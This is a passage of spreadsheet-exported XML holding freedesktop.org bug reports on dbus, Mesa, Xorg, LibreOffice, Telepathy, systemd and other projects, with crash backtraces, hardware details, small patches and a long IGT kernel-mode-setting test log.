[   15.904157] [drm:amdgpu_ib_ring_tests [amdgpu]] *ERROR* amdgpu: failed testing IB on ring 12 (-110).                                                                               
[   15.904192] [drm:amdgpu_device_ip_late_init_func_handler [amdgpu]] *ERROR* ib ring test failed (-110).</t>
  </si>
  <si>
    <t>DBUS-3650</t>
  </si>
  <si>
    <t>libdbus segfaults on incomplete DBUS_SESSION_BUS_ADDRESS value</t>
  </si>
  <si>
    <t>I was playing with dbus and trying to make it use tcp as the transport (which I
have since figured out but still) and get this:
$ DBUS_SESSION_BUS_ADDRESS=tcp:port=12345 gdb dbus-monitor 
[...]
(gdb) run
Starting program: /usr/bin/dbus-monitor
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV Segmentation fault.
0x0fd68678 in strlen () from /lib/libc.so.6
(gdb) bt full
#0  0x0fd68678 in strlen () from /lib/libc.so.6
No symbol table info available.
#1  0x0fea3214 in dbus_shutdown () from /usr/lib/libdbus-1.so.0
No symbol table info available.
[no useful stack dump more apparent calls to dbus_shutdown() printed]
I since realised that specifying the value as tcp:host=...port=... works but a
segfault is little encouraging.</t>
  </si>
  <si>
    <t>johannes</t>
  </si>
  <si>
    <t>MESA-22703</t>
  </si>
  <si>
    <t>[G45] some intel_gpu_tools failed together sometimes</t>
  </si>
  <si>
    <t>Created attachment 27557
xorg.conf
System Environment:
--------------------------
Arch:           x86_64
Platform:               G45
Libdrm:		(master)4179c5f0a69b452cf94a507c13021e4918a3e02d
Mesa:		(master)be64e66e5aeed83ebcd11ccfd5ff461e8145a850
Xserver:		(master)55ac155d42268009eaecbc183329a8744d6ae48c
Xf86_video_intel:	(master)216d939858abc924f2e32c95518f937f29ea018e
Kernel:       (drm-intel-next)b3d254955fb5797232ec329b136c363aa4fdaa05
Bug detailed description:
-------------------------
some intel_gpu_tools fail today they are gem_readwrite gem_ringfill gem_mmap gem_pread_after_blit gem_tiled_pread gem_tiled_blits gem_largeobject. They failed sometimes but they failed together every time it failed. But I can't reproduce it even I run it 100 times successively. 
Reproduce steps:
----------------
1. xinit&amp;
2. run the case.</t>
  </si>
  <si>
    <t>PORTLAND-91996</t>
  </si>
  <si>
    <t>xdg-email: Recipients passed to Thunderbird are incorrectly quoted</t>
  </si>
  <si>
    <t>Created attachment 118253
xdg-email-thunderbird-quoting.patch
For example if I run:
  xdg-email --to pelle@debian.org
Thunderbird opens a compose window with the To field set to 'pelle@debian.org '. I.e. it tries to e-mail somebody whose name is pelle@debian.org but with an empty e-mail address.
The problem is that xdg-email quotes the recipient fields (even with BOTH single and double quotes!). Removing the quotes fixes the problem. I have attached a patch to do just that.
It might be the case that older versions of TB need the quotes (I run Thunderbird (Icedove) 40.0). If anyone knows which versions need the quotes I could implement a check for that.</t>
  </si>
  <si>
    <t>TELEPATHY-28700</t>
  </si>
  <si>
    <t>Rename Senders to Members in Call</t>
  </si>
  <si>
    <t>From #24936
&gt; - IMHO Call.Stream.Senders should be called Call.Stream.Members they are
&gt; members of the stream and may not be sending anything.</t>
  </si>
  <si>
    <t>XORG-26833</t>
  </si>
  <si>
    <t>[Intel 915GM][KMS]: Secondary display output detected as TV instead of VGA</t>
  </si>
  <si>
    <t>Created attachment 33678
dmesg with drm.debug=0x04 boot parameter
---Problem Description---
Secondary display detected as TV out instead of VGA on Intel 915GM video
chipset.
Contact Information = Vance/liangghv@sg.ibm.com 
---uname output---
2.6.32.8-0.3-pae
Machine Type = 4810-340 
---Debugger---
A debugger is not configured
---Steps to Reproduce---
 Install SLED 11 SP1 Beta 5 on the machine. Use Xrandr to see the available
video outputs</t>
  </si>
  <si>
    <t>LIBREOFFICE-62258</t>
  </si>
  <si>
    <t>VIEWING: Wrong order of shapes in a PPTX</t>
  </si>
  <si>
    <t>Created attachment 76436
PPTX shape order
In PowerPoint 2007 the text is in front of the shape while in LibreOffice the shapes hides the text.
Operating System: Windows 7
Version: 4.0.1.2 release</t>
  </si>
  <si>
    <t>ofirr.dev</t>
  </si>
  <si>
    <t>MESA-87091</t>
  </si>
  <si>
    <t>[gen4] GPU hang in Chrome</t>
  </si>
  <si>
    <t>Created attachment 110556
Relevant kern.log entries
Chrome Version       : 39.0.2171.65 (Developer Build) Ubuntu 14.04
URLs (if applicable) : inbox.google.com
Other browsers tested: -
What steps will reproduce the problem?
1. Open Chromium
2. Go to inbox.google.com
3. Click on a mail conversation to expand it
What is the expected result?
The mail conversation should be opened/expanded
What happens instead?
The computer freeze up and I have to use the computers power switch to force it to power off. 
Hardware and software info:
kenneho@kenneho-jobb:~$ uname -a
Linux kenneho-jobb 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
kenneho@kenneho-jobb:~$ 
kenneho@kenneho-jobb:~$ cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=Ubuntu 14.04.1 LTS
Other info: 
1) I managed to get (hopefully) relevant lines from /var/log/kern.log after a crash. The file excerpts is attached filename chromium-crash-kern.log.
2) I have the same problem on my Acer laptop but don't have the hardware and software specifics available at this time. 
3) I do not have the issue on my other desktop running Ubuntu (14.04 if I'm not mistaking). 
4) I've attached the output from sudo lshw in the file lshw.txt</t>
  </si>
  <si>
    <t>kenneho</t>
  </si>
  <si>
    <t>TELEPATHY-46835</t>
  </si>
  <si>
    <t>[next] disentangle circular dependencies and move tp_cli_* into -dbus library</t>
  </si>
  <si>
    <t>Created attachment 57868
serious WIP with some rubbish in it too
We need to generate a libtelepathy-glib-lowlevel library which only has generated code in it as per the 1.0 vision.
I worked on this for a while but to be honest couldn't get libtool to play ball. I've attached the serious serious WIP patch which I had a while ago. It should probably only be used as a oh that's how you tried to do it.
Simon fancy doing this? You will probably actually get it right after all. :-)</t>
  </si>
  <si>
    <t>PIXMAN-22796</t>
  </si>
  <si>
    <t>X crashes since upgrading to pixman 0.10.16 today</t>
  </si>
  <si>
    <t>I upgraded rawhide today bringing in pixman 0.10.16 and started getting frequent crashes:
The last thing I can see in the X log is:
Xorg: pixman-region.c:1114: pixman_region_intersect: Assertion `pixman_region_selfcheck (reg2)' failed.
I'm not sure how to track it down further right now</t>
  </si>
  <si>
    <t>thaytan</t>
  </si>
  <si>
    <t>MESA-73096</t>
  </si>
  <si>
    <t>Query GL_RGBA_SIGNED_COMPONENTS_EXT missing</t>
  </si>
  <si>
    <t>Created attachment 91251
Patch to add a regression test to piglit
The EXT_packed_float extension defines a glGet* query GL_RGBA_SIGNED_COMPONENTS_EXT. However querying it in Mesa generates GL_INVALID_ENUM and a search of the codebase seems to indicate that it is not implemented.
I'm using Mesa 10.0.1 which is not yet a valid Version in the bug-tracker.
I'll attach a patch to piglit to add a test for this. Let me know if you'd like me to do anything about getting it pushed into the piglit code base.</t>
  </si>
  <si>
    <t>bmerry</t>
  </si>
  <si>
    <t>XORG-38153</t>
  </si>
  <si>
    <t>SNA: Typo in configure.ac at AC_ARG_ENABLE (ge4 instead of gen4)</t>
  </si>
  <si>
    <t>In the first SandyBridge's New Acceleration commit (sna: Introduce a new acceleration model. commit bcef98af561939aa48d9236b2dfa2c5626adf4cb) there is a typo in configure.ac:
+AC_ARG_ENABLE(sna
+	      AS_HELP_STRING([--enable-sna]
+			     [Enable SandyBridge's New Acceleration (SNA) [options=default|gen2|gen3|ge4|gen5|gen6]])
+	      [SNA=$enableval]
+	      [SNA=no])
You can see in the third line above that gen4 is typo'd as ge4.</t>
  </si>
  <si>
    <t>stenten</t>
  </si>
  <si>
    <t>XORG-1324</t>
  </si>
  <si>
    <t>App/xorgcfg</t>
  </si>
  <si>
    <t>Module _XXX_ does not have a _XXX_ModuleData data object. (for damage cw)</t>
  </si>
  <si>
    <t>running xorgcfg (with Xorg already configured and running) it was very verbose
on module loading and i got those :
Loading /usr/X11R6/lib/modules/libdamage.a
LoadModule: Module damage does not have a damageModuleData data object.
Unloading /usr/X11R6/lib/modules/libdamage.a
Failed to load module damage (invalid module 0)
Loading /usr/X11R6/lib/modules/libcw.a
LoadModule: Module cw does not have a cwModuleData data object.
Unloading /usr/X11R6/lib/modules/libcw.a
Failed to load module cw (invalid module 0)
and also those : (not related to first issue)
Loading /usr/X11R6/lib/modules/drivers/nvidia_drv.o
Module nvidia: vendor=NVIDIA Corporation
        compiled for 4.0.2 module version = 1.0.6111
NVIDIA X Driver  1.0-6111  Tue Jul 27 07:56:22 PDT 2004
NVIDIA Unified Driver for all NVIDIA GPUs
  ERROR SIGILL caught!
Loading /usr/X11R6/lib/modules/drivers/ati_drv.o
Module ati: vendor=X.Org Foundation
        compiled for 6.8.0 module version = 6.5.6
  ERROR SIGSEGV caught!
i use xorg-x11 6.8.0 on gentoo x86 along with nvidia binary driver 61.11
this module was already loaded as my display driver when i launched xorgcfg</t>
  </si>
  <si>
    <t>SYSTEMD-90540</t>
  </si>
  <si>
    <t>Add DPI information for MS Arc Touch Mouse</t>
  </si>
  <si>
    <t>$ sudo ./mouse-dpi-tool /dev/input/event17 
Mouse Arc Touch Mouse SE on /dev/input/event17
Move the device 250mm/10in or more along the x-axis.
Pause 3 seconds before movement to reset Ctrl+C to exit.
Covered distance in device units:    11345 at frequency infHz Hz\^C	-
Estimated sampling frequency: -2147483648Hz
To calculate resolution measure physical distance covered
and look up the matching resolution in the table below
     720mm	   28.36in	     400dpi
     480mm	   18.91in	     600dpi
     360mm	   14.18in	     800dpi
     288mm	   11.35in	    1000dpi
     240mm	    9.45in	    1200dpi
     205mm	    8.10in	    1400dpi
     180mm	    7.09in	    1600dpi
     160mm	    6.30in	    1800dpi
     144mm	    5.67in	    2000dpi
     130mm	    5.16in	    2200dpi
     120mm	    4.73in	    2400dpi
If your resolution is not in the list calculate it with:
	resolution=11345/inches or
	resolution=11345 * 25.4/mm
Entry for hwdb match (replace XXX with the resolution in DPI):
mouse:bluetooth:v045ep07f3:name:Arc Touch Mouse SE:
 MOUSE_DPI=XXX@-2147483648
The estimated frequency is completely out of whack but the USB dongley version of the mouse is advertised as 1000dpi:
http://www.cnet.com/products/microsoft-arc-touch-mouse-black-series/specs/</t>
  </si>
  <si>
    <t>POPPLER-104398</t>
  </si>
  <si>
    <t>2 uid/gids in the source tarballs since poppler-0.60.0</t>
  </si>
  <si>
    <t>Created attachment 136415
add --owner root:0 --group root:0 options to tar command in dist target
Because git-archive always uses root:root in the generated tarball
the source tarballs (since 0.60.0) have 2 uid/gids in it.
root:root by git-archive and normal users/group by normal tar.
For detail please find the analysis at::
https://lists.freedesktop.org/archives/poppler/2017-December/012737.html
Here is a trivial patch adding --owner root:0 --group root:0 to the
dist target of cmake.
Also I've written a patch for git-archive. If the maintainer wants
to postpone the decision after seeing how git maintainers deals with
please do so.
Regards
mpsuzuki</t>
  </si>
  <si>
    <t>mpsuzuki</t>
  </si>
  <si>
    <t>HAL-20616</t>
  </si>
  <si>
    <t>Sansa Fuze</t>
  </si>
  <si>
    <t>I recently bought a SanDisk Sansa Fuze player and noticed that hal FDI files do not list it as supporting Ogg Vorbis files.
The packaging for the player says it does support Vorbis and didn't have any trouble playing files I put on the player.
The USB vendor ID is 0x0781 and the product ID is 0x74c1.
The supported formats seem pretty close to those listed for Sansa Clip version II including the extra audio_folders and support for audible format files.
From what I can tell all Fuze players can be updated to support the extra formats with a firmware update so it might be worth merging them all into the same set of rules as the Clip version II ones.</t>
  </si>
  <si>
    <t>LIBREOFFICE-75727</t>
  </si>
  <si>
    <t>CALC doesn't remember the csv export settings</t>
  </si>
  <si>
    <t>I frequently save csv with s epcific text delimiter. After I perform SAVE AS&gt;Edit Filter Settings make the change to the text delimiter.
The change I make are not persistent.</t>
  </si>
  <si>
    <t>tritran</t>
  </si>
  <si>
    <t>LIBREOFFICE-66370</t>
  </si>
  <si>
    <t>FILEOPEN: MS .docx Fails to import properly. Table rendered incorrectly (3/6)</t>
  </si>
  <si>
    <t>This bug was tested LibreOffice v4.1 RC1 running in windows 7 and XP. It appears that LibreOffice loses formatting when importing MS .docx files. I have attached an example.
Steps to reproduce the bug:
1. Open attached Demo-Hayden-Management.docx document in writer 
2. Open attached Demo-Hayden-Management.docx document in Word2007/Office 365
3. Compare the documents. 
Note from item #3 from the screenshot that the Chart is rendered incorrectly.</t>
  </si>
  <si>
    <t>DRI-101636</t>
  </si>
  <si>
    <t>[IGT] kms_concurrent some subtest causes assertion failure</t>
  </si>
  <si>
    <t>Created attachment 132322
dmesg.log
The following test cases causes assertion failure on GLK and latest configuration
test output
====================================
IGT-Version: 1.19-g9918014 (x86_64) (Linux: 4.12.0-rc7-drm-tip-ww26-commit-85a692e+ x86_64)
(kms_concurrent:1419) igt-core-DEBUG: Test requirement passed: !igt_run_in_simulation()
(kms_concurrent:1419) drmtest-DEBUG: Test requirement passed: !(fd&lt;0)
(kms_concurrent:1419) igt-debugfs-DEBUG: Opening debugfs directory '/sys/kernel/debug/dri/0'
(kms_concurrent:1419) drmtest-DEBUG: Test requirement passed: drmSetMaster(fd) == 0
(kms_concurrent:1419) igt-kms-DEBUG: VT: graphics mode set (mode was 0x0)
(kms_concurrent:1419) igt-kms-DEBUG: display: init {
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 60 to 1
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 68 to 1
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 72 to 1
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 75 to 1
(kms_concurrent:1419) igt-kms-DEBUG: display: }
(kms_concurrent:1419) DEBUG: Test requirement passed: data.display.n_pipes &gt; 0
(kms_concurrent:1419) DEBUG: Test requirement passed: data.display.is_atomic
(kms_concurrent:1419) DEBUG: Test requirement passed: !(pipe &gt;= data-&gt;display.n_pipes)
(kms_concurrent:1419) DEBUG: Test requirement passed: data-&gt;display.pipes[pipe].n_planes &gt; 0
(kms_concurrent:1419) DEBUG: Test requirement passed: valid_tests
(kms_concurrent:1419) igt-core-DEBUG: Starting subtest: pipe-A
Testing resolution with connector eDP-1 using pipe A with seed 1498684117
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: set_pipe(A)
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 60 to 1
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: Selecting pipe A
(kms_concurrent:1419) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=1920 height=1080 format=0x34325258 tiling=0x100000000000001 size=0)
(kms_concurrent:1419) drmtest-DEBUG: Test requirement passed: is_i915_device(fd) &amp;&amp; has_known_intel_chipset(fd)
(kms_concurrent:1419) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=1 pitch=7680)
(kms_concurrent:1419) igt-kms-DEBUG: display: A.0: plane_set_fb(62)
(kms_concurrent:1419) igt-kms-DEBUG: display: commit {
(kms_concurrent:1419) igt-kms-DEBUG: display:     A: Setting mode 1920x1080 from eDP-1
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.0 fb 62
(kms_concurrent:1419) igt-kms-DEBUG: display:     src = (0 0) 1920 x 1080 dst = (0 0) 1920 x 1080
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     B: Setting NULL mode
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     C: Setting NULL mode
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     eDP-1: preparing atomic pipe: A
(kms_concurrent:1419) igt-kms-DEBUG: display:     DP-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-2: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display: }
(kms_concurrent:1419) DEBUG: Test requirement passed: !(ret != 0)
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: set_pipe(A)
(kms_concurrent:1420) igt-kms-DEBUG: display: eDP-1: set_pipe(A)
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 60 to 1
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: Selecting pipe A
(kms_concurrent:1419) igt-kms-DEBUG: display: commit {
(kms_concurrent:1419) igt-kms-DEBUG: display:     A: Setting mode Custom 1024x768 from eDP-1
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.0 fb 62
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     eDP-1: preparing atomic pipe: A
(kms_concurrent:1420) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 60 to 1
(kms_concurrent:1419) igt-kms-DEBUG: display:     DP-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-2: preparing atomic pipe: None
(kms_concurrent:1420) igt-kms-DEBUG: display: eDP-1: Selecting pipe A
(kms_concurrent:1419) igt-kms-DEBUG: display: }
(kms_concurrent:1419) igt-kms-CRITICAL: Test assertion failure function do_display_commit file igt_kms.c:2703:
(kms_concurrent:1419) igt-kms-CRITICAL: Failed assertion: ret == 0
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=256 height=256 format=0x34325258 tiling=0x100000000000001 size=0)
(kms_concurrent:1420) drmtest-DEBUG: Test requirement passed: is_i915_device(fd) &amp;&amp; has_known_intel_chipset(fd)
(kms_concurrent:1419) igt-kms-CRITICAL: Last errno: 22 Invalid argument
(kms_concurrent:1419) igt-kms-CRITICAL: error: -22 != 0
Stack trace:
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=2 pitch=1024)
(kms_concurrent:1420) igt-kms-DEBUG: display: A.1: plane_set_position(871614)
(kms_concurrent:1420) igt-kms-DEBUG: display: A.1: plane_set_fb(110)
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=256 height=256 format=0x34325258 tiling=0x100000000000001 size=0)
(kms_concurrent:1420) drmtest-DEBUG: Test requirement passed: is_i915_device(fd) &amp;&amp; has_known_intel_chipset(fd)
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=3 pitch=1024)
(kms_concurrent:1420) igt-kms-DEBUG: display: A.2: plane_set_position(112935)
(kms_concurrent:1420) igt-kms-DEBUG: display: A.2: plane_set_fb(112)
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=256 height=256 format=0x34325258 tiling=0x100000000000001 size=0)
(kms_concurrent:1420) drmtest-DEBUG: Test requirement passed: is_i915_device(fd) &amp;&amp; has_known_intel_chipset(fd)
  #0 [__igt_fail_assert+0x101]
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=4 pitch=1024)
(kms_concurrent:1420) igt-kms-DEBUG: display: A.3: plane_set_position(209287)
(kms_concurrent:1420) igt-kms-DEBUG: display: A.3: plane_set_fb(114)
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=128 height=128 format=0x34325241 tiling=0x0 size=0)
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=5 pitch=512)
  #1 [do_display_commit+0xaf5]
(kms_concurrent:1420) igt-kms-DEBUG: display: A.4: plane_set_position(1354660)
(kms_concurrent:1420) igt-kms-DEBUG: display: A.4: plane_set_fb(118)
(kms_concurrent:1420) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=1920 height=1080 format=0x34325258 tiling=0x100000000000001 size=0)
(kms_concurrent:1420) drmtest-DEBUG: Test requirement passed: is_i915_device(fd) &amp;&amp; has_known_intel_chipset(fd)
  #2 [+0xaf5]
Subtest pipe-A failed.
**** DEBUG ****
(kms_concurrent:1419) INFO: Testing resolution with connector eDP-1 using pipe A with seed 1498684117
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: set_pipe(A)
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 60 to 1
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: Selecting pipe A
(kms_concurrent:1419) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=1920 height=1080 format=0x34325258 tiling=0x100000000000001 size=0)
(kms_concurrent:1419) drmtest-DEBUG: Test requirement passed: is_i915_device(fd) &amp;&amp; has_known_intel_chipset(fd)
(kms_concurrent:1419) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=1 pitch=7680)
(kms_concurrent:1419) igt-kms-DEBUG: display: A.0: plane_set_fb(62)
(kms_concurrent:1419) igt-kms-DEBUG: display: commit {
(kms_concurrent:1419) igt-kms-DEBUG: display:     A: Setting mode 1920x1080 from eDP-1
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.0 fb 62
(kms_concurrent:1419) igt-kms-DEBUG: display:     src = (0 0) 1920 x 1080 dst = (0 0) 1920 x 1080
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     B: Setting NULL mode
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     C: Setting NULL mode
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     eDP-1: preparing atomic pipe: A
(kms_concurrent:1419) igt-kms-DEBUG: display:     DP-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-2: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display: }
(kms_concurrent:1419) DEBUG: Test requirement passed: !(ret != 0)
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: set_pipe(A)
(kms_concurrent:1419) igt-kms-DEBUG: Setting Broadcast RGB mode on connector 60 to 1
(kms_concurrent:1419) igt-kms-DEBUG: display: eDP-1: Selecting pipe A
(kms_concurrent:1419) igt-kms-DEBUG: display: commit {
(kms_concurrent:1419) igt-kms-DEBUG: display:     A: Setting mode Custom 1024x768 from eDP-1
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.0 fb 62
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: A.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: B.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.0 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.1 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.2 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.3 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     populating plane data: C.4 fb 0
(kms_concurrent:1419) igt-kms-DEBUG: display:     eDP-1: preparing atomic pipe: A
(kms_concurrent:1419) igt-kms-DEBUG: display:     DP-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-1: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display:     HDMI-A-2: preparing atomic pipe: None
(kms_concurrent:1419) igt-kms-DEBUG: display: }
(kms_concurrent:1419) igt-kms-CRITICAL: Test assertion failure function do_display_commit file igt_kms.c:2703:
(kms_concurrent:1419) igt-kms-CRITICAL: Failed assertion: ret == 0
(kms_concurrent:1419) igt-kms-CRITICAL: Last errno: 22 Invalid argument
(kms_concurrent:1419) igt-kms-CRITICAL: error: -22 != 0
****  END  ****
Subtest pipe-A: FAIL (0.154s)
(kms_concurrent:1419) DEBUG: Test requirement passed: !(pipe &gt;= data-&gt;display.n_pipes)
(kms_concurrent:1419) DEBUG: Test requirement passed: data-&gt;display.pipes[pipe].n_planes &gt; 0
(kms_concurrent:1419) DEBUG: Test requirement passed: valid_tests
(kms_concurrent:1419) DEBUG: Test requirement passed: !(pipe &gt;= data-&gt;display.n_pipes)
(kms_concurrent:1419) DEBUG: Test requirement passed: data-&gt;display.pipes[pipe].n_planes &gt; 0
(kms_concurrent:1419) DEBUG: Test requirement passed: valid_tests
Test requirement not met in function run_tests_for_pipe file kms_concurrent.c:354:
Test requirement: !(pipe &gt;= data-&gt;display.n_pipes)
Test requirement not met in function run_tests_for_pipe file kms_concurrent.c:354:
Test requirement: !(pipe &gt;= data-&gt;display.n_pipes)
Test requirement not met in function run_tests_for_pipe file kms_concurrent.c:354:
Test requirement: !(pipe &gt;= data-&gt;display.n_pipes)
(kms_concurrent:1419) igt-core-DEBUG: Exiting with status code 99
(kms_concurrent:1419) igt-kms-DEBUG: VT: original mode 0x0 restored
(kms_concurrent:1419) igt-debugfs-DEBUG: Opening debugfs directory '/sys/kernel/debug/dri/0'
======================================
             Software
======================================
architecture                : x86_64
os version                  : Ubuntu 16.10
os codename                 : yakkety
kernel driver               : i915
bios revision               : 50.51
bios release date           : 06/02/2017
ksc                         : 1.32
======================================
        Graphic drivers
======================================
Component: drm
    tag: libdrm-2.4.80-29-g7e6bf88
    commit: 7e6bf88cac315a9fa41818cf72a7b5d18a2cb1fc
Component: cairo
    tag: 1.15.4-28-g57b4050
    commit: 57b40507dda3f58dfc8635548d606b86dc7bcf51
Component: intel-gpu-tools
    tag: intel-gpu-tools-1.18-284-g9918014
    commit: 9918014df55d0393f99a31e3c398a4b38c90bb80
Component: piglit
    tag: piglit-v1
    commit: 1b8356e6dfa07480c154fccb47f6ef9c908ef652
======================================
             Kernel
======================================
commit 85a692e2c6a7cf93082044d776e838cb9e9b2146
Author:     Chris Wilson 
AuthorDate: Wed Jun 28 15:25:29 2017 +0100
